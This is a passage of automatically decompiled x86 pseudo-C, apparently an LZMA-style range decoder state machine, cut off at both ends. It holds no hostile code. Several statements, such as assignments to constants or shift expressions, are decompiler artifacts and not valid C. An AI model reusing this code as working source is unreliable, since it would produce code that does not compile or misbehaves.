                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            							L88:
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            							goto L89;
                                                                                                                                                                                                                            						case 0xc:
                                                                                                                                                                                                                            							L99:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t334 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t334;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            							goto L101;
                                                                                                                                                                                                                            						case 0xd:
                                                                                                                                                                                                                            							L37:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t122 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t122;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							L39:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            								goto L48;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                                                                            								goto L54;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L41:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                                            							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                                                                            							__eax = __eax << 8;
                                                                                                                                                                                                                            							__eax = __eax + __ebx;
                                                                                                                                                                                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edx;
                                                                                                                                                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								goto L39;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L37;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 0xe:
                                                                                                                                                                                                                            							L46:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t156 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t156;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								L48:
                                                                                                                                                                                                                            								__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            								__edx = __ebx + __ebx;
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            								__esi = __edx + __eax;
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            								__ax =  *__esi;
                                                                                                                                                                                                                            								 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            								__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            									__cx = __ax;
                                                                                                                                                                                                                            									_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                                            									__ebx = _t170;
                                                                                                                                                                                                                            									__cx = __ax >> 5;
                                                                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                                                                            									 *__esi = __ax;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            									0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            									__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            									 *__esi = __cx;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L54:
                                                                                                                                                                                                                            							_t173 = __ebp - 0x34;
                                                                                                                                                                                                                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                                            							__eflags =  *_t173;
                                                                                                                                                                                                                            							goto L55;
                                                                                                                                                                                                                            						case 0xf:
                                                                                                                                                                                                                            							L58:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t203 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t203;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							L60:
                                                                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                                                                            								L55:
                                                                                                                                                                                                                            								__al =  *(__ebp - 0x44);
                                                                                                                                                                                                                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                                            								goto L56;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L61:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__edx = __ebx + __ebx;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                                            								__ebx = _t217;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								goto L60;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L58;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 0x10:
                                                                                                                                                                                                                            							L109:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t365 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t365;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							goto L111;
                                                                                                                                                                                                                            						case 0x11:
                                                                                                                                                                                                                            							goto L69;
                                                                                                                                                                                                                            						case 0x12:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                                            								goto L132;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                                            							goto L130;
                                                                                                                                                                                                                            						case 0x13:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								_t469 = __ebp - 0x58;
                                                                                                                                                                                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                                            								__eflags =  *_t469;
                                                                                                                                                                                                                            								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                                            								 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                                            								L144:
                                                                                                                                                                                                                            								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                                            								goto L145;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            							 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                                            							L130:
                                                                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            							 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                                            							goto L144;
                                                                                                                                                                                                                            						case 0x14:
                                                                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                                            							goto L140;
                                                                                                                                                                                                                            						case 0x15:
                                                                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            							__al = __al & 0x000000fd;
                                                                                                                                                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            							goto L120;
                                                                                                                                                                                                                            						case 0x16:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            							__eflags = __eax - 4;
                                                                                                                                                                                                                            							if(__eax >= 4) {
                                                                                                                                                                                                                            								_push(3);
                                                                                                                                                                                                                            								_pop(__eax);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            							 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                                            							__eax = __eax << 7;
                                                                                                                                                                                                                            							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            							goto L145;
                                                                                                                                                                                                                            						case 0x17:
                                                                                                                                                                                                                            							L145:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							goto L149;
                                                                                                                                                                                                                            						case 0x18:
                                                                                                                                                                                                                            							L146:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t484 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t484;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							L148:
                                                                                                                                                                                                                            							_t487 = __ebp - 0x48;
                                                                                                                                                                                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            							__eflags =  *_t487;
                                                                                                                                                                                                                            							L149:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                                            								__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                                            								0 = 1;
                                                                                                                                                                                                                            								__eax = 1 << __cl;
                                                                                                                                                                                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            								goto L140;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__eax = __eax - __ecx;
                                                                                                                                                                                                                            								__edx = __edx + 1;
                                                                                                                                                                                                                            								__eflags = __edx;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            								 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								goto L148;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L146;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 0x19:
                                                                                                                                                                                                                            							__eflags = __ebx - 4;
                                                                                                                                                                                                                            							if(__ebx < 4) {
                                                                                                                                                                                                                            								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                                            								L119:
                                                                                                                                                                                                                            								_t393 = __ebp - 0x2c;
                                                                                                                                                                                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                                            								__eflags =  *_t393;
                                                                                                                                                                                                                            								L120:
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								if(__eax == 0) {
                                                                                                                                                                                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                                            									goto L170;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                                            									goto L171;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            								_t400 = __ebp - 0x60;
                                                                                                                                                                                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                                            								__eflags =  *_t400;
                                                                                                                                                                                                                            								goto L123;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = __ebx;
                                                                                                                                                                                                                            							__eax = __ebx;
                                                                                                                                                                                                                            							__ecx = __ebx >> 1;
                                                                                                                                                                                                                            							__eax = __ebx & 0x00000001;
                                                                                                                                                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                                            							__al = __al | 0x00000002;
                                                                                                                                                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                                            							__eflags = __ebx - 0xe;
                                                                                                                                                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            							if(__ebx >= 0xe) {
                                                                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                                                                            								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                                            								L102:
                                                                                                                                                                                                                            								__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            									__eax = __eax + __ebx;
                                                                                                                                                                                                                            									 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                                            									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            									__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                                                                            									L108:
                                                                                                                                                                                                                            									__ebx = 0;
                                                                                                                                                                                                                            									 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            									 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            									 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                                            									 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                                            									L112:
                                                                                                                                                                                                                            									__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            										_t391 = __ebp - 0x2c;
                                                                                                                                                                                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                                            										__eflags =  *_t391;
                                                                                                                                                                                                                            										goto L119;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            									__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            									__esi = __edi + __eax;
                                                                                                                                                                                                                            									 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            									__ax =  *__esi;
                                                                                                                                                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                                            										__ecx = 0;
                                                                                                                                                                                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                                            										__ecx = 1;
                                                                                                                                                                                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            										__ebx = 1;
                                                                                                                                                                                                                            										__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                                            										__ebx = 1 << __cl;
                                                                                                                                                                                                                            										__ecx = 1 << __cl;
                                                                                                                                                                                                                            										__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                                            										__cx = __ax;
                                                                                                                                                                                                                            										__cx = __ax >> 5;
                                                                                                                                                                                                                            										__eax = __eax - __ecx;
                                                                                                                                                                                                                            										__edi = __edi + 1;
                                                                                                                                                                                                                            										__eflags = __edi;
                                                                                                                                                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            										 *__esi = __ax;
                                                                                                                                                                                                                            										 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                                            									} else {
